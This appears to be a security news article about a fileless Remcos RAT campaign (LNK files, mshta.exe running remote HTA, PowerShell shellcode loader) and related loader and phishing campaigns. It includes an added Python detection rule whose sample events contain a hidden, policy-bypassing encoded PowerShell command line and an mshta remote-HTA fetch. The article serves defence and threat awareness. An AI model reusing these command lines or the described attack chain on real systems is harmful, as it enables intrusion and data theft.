
Cybersecurity researchers are shedding light on a new malware campaign that uses a PowerShell-based shellcode loader to deploy a remote access trojan called Remcos RAT.
"Threat actors deliver malicious LNK files embedded in ZIP archives, often disguised as Office documents," Qualys security researcher Akshay Thorve said in a technical report. "The attack chain utilizes MSHTA.EXE for proxy execution early on."
As Qualys details, the latest attacks use tax-related lures to entice users into opening malicious ZIP archives containing Windows shortcut (LNK) files.
The mshta.exe binary is used to run an obfuscated HTA file named "xlab22.hta", hosted on a remote server, that incorporates Visual Basic Script code to download a PowerShell script, a decoy PDF, and another HTA file similar to xlab22.hta called "311.hta". The HTA file is configured to modify the Windows registry so that "311.hta" runs automatically when the system starts up.
Once the PowerShell script is run, it decodes and reconstructs the shellcode loader, which then proceeds to load the Remcos RAT payload fully in memory.
Remcos RAT is a well-known malware family that gives threat actors complete control over a compromised system, making it an ideal tool for cyber espionage and data theft. The 32-bit binary, compiled with Visual Studio C++ 8, has a modular structure that allows it to collect system metadata, log keystrokes, capture screenshots, monitor clipboard data, and enumerate installed programs and running processes.

It also "establishes a TLS connection to a command-and-control (C2) server at ReadySteaurants[.]com, maintaining a persistent channel for data exfiltration and control."
This is not the first time a fileless version of Remcos RAT has been spotted in the wild. In November 2024, Fortinet FortiGuard Labs detailed a phishing campaign that deployed the malware using order-themed lures.
What makes this attack method appealing to threat actors is that the malicious code runs directly in computer memory and leaves almost no trace on disk, allowing it to operate undetected by many traditional security solutions.
"The rise of PowerShell-based attacks like the new Remcos RAT variant shows that threat actors are evolving to evade traditional security measures," says J Stephen Kowski, field CTO at SlashNext.
"This fileless malware runs directly in memory by executing obfuscated PowerShell scripts that can bypass traditional defenses, using LNK files and MSHTA.exe. Advanced email security is important to detect and block malicious LNK attachments before they reach the user."
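As an added illustration, not part of the Qualys report or this article, the following Python check runs over a handful of constructed process-creation events (a Sysmon-like shape; the field names, the sample events and the host name are assumptions) and flags the chain described above: mshta.exe executing a remote HTA, and PowerShell spawned beneath it, optionally with an encoded command.

```python
import re

# Constructed process-creation events in a Sysmon-like shape (not real telemetry).
# pid 200/300 model the chain from the article; pid 400/500 are benign look-alikes.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/xlab22.hta"},
    {"pid": 300, "ppid": 200, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -ep bypass -enc SQBFAFgA..."},
    {"pid": 400, "ppid": 100, "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": "mshta.exe C:\\Program Files\\Vendor\\setup.hta"},
    {"pid": 500, "ppid": 100, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

# mshta.exe pulling its HTA over HTTP(S) is the proxy-execution step described above.
REMOTE_HTA = re.compile(r"https?://\S+", re.IGNORECASE)
# Any of PowerShell's abbreviations for -EncodedCommand.
ENCODED_FLAG = re.compile(r"-(e|ec|enc|encodedcommand)\b", re.IGNORECASE)


def image_name(event):
    """Lower-case file name of the process image, e.g. 'mshta.exe'."""
    return event["image"].rsplit("\\", 1)[-1].lower()


def ancestors(event, by_pid):
    """Yield image names of the parent chain, nearest parent first (cycle-safe)."""
    seen = set()
    parent = by_pid.get(event["ppid"])
    while parent is not None and parent["pid"] not in seen:
        seen.add(parent["pid"])
        yield image_name(parent)
        parent = by_pid.get(parent["ppid"])


def find_suspicious_chains(events):
    """Return (pid, reason) pairs for events matching the LNK -> mshta -> PowerShell pattern."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = image_name(e)
        if name == "mshta.exe" and REMOTE_HTA.search(e["cmdline"]):
            findings.append((e["pid"], "mshta.exe executing a remote HTA"))
        if name == "powershell.exe" and "mshta.exe" in ancestors(e, by_pid):
            reason = "powershell.exe spawned under mshta.exe"
            if ENCODED_FLAG.search(e["cmdline"]):
                reason += " with an encoded command"
            findings.append((e["pid"], reason))
    return findings
```

The local-HTA and scheduled-script events are deliberately left unflagged so the rule keys on the remote fetch and the parent chain rather than on mshta.exe or PowerShell alone.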

The disclosure comes as Palo Alto Networks Unit 42 and Threatray detailed new .NET loaders used to deploy a wide range of commodity information stealers and RATs, including Agent Tesla, NovaStealer, RemcosRAT, VIPKeylogger, XLoader, and XWorm.
The loader features three stages that work in tandem to deploy the final-stage payload: a .NET executable that embeds the second and third stages in encrypted form.
"The previous versions incorporate the second stage as a hard-coded string, while more recent versions use bitmap resources," Threatray said. "The first stage extracts this data, decrypts it, then runs it in memory to launch the second stage."
Unit 42 described the use of bitmap resources as a way to bypass traditional security mechanisms and hide malicious payloads from detection.
The findings also coincide with the emergence of several phishing and social engineering campaigns designed for credential theft and malware delivery:
- A trojanized version of the KeePass password manager (codenamed KeeLoader) used to drop Cobalt Strike beacons and steal sensitive KeePass database data, including administrative credentials. The malicious installer is hosted on a KeePass typosquat domain served via Bing Ads.
- ClickFix lures and URLs embedded in PDF documents, together with a set of intermediate dropper URLs, used to deploy Lumma Stealer.
- Booby-trapped Microsoft Office documents used to deploy the Formbook information stealer, protected with a malware distribution service called Horus Protector.
- Credential phishing pages loaded locally from phishing emails using Blob URIs. The Blob URIs are served through an allow-listed page (e.g. onedrive.live[.]com) that is abused to redirect victims to malicious sites containing links to threat actor-controlled HTML pages.
- RAR archives posing as setup files used to distribute NetSupport RAT in attacks targeting Ukraine and Poland.
- Phishing emails distributing HTML attachments containing malicious code that captures victims' Outlook, Hotmail, and Gmail credentials and exfiltrates them to a Telegram bot named "Blessed Logs", which has been active since February 2025.

This development coincides with a rise in artificial intelligence (AI)-powered campaigns that use polymorphic tricks with real-time mutation, such as changing the email subject, sender name, and body content to slip past signature-based detections.
“AI has given threat actors the power to automate malware development, expand attacks across the industry, and personalize phishing messages with surgical accuracy,” says Cofense.
"These evolving threats can bypass traditional email filters through polymorphic phishing campaigns that shift content on the fly, highlighting the limitations of perimeter-only defenses and the need for post-delivery detection."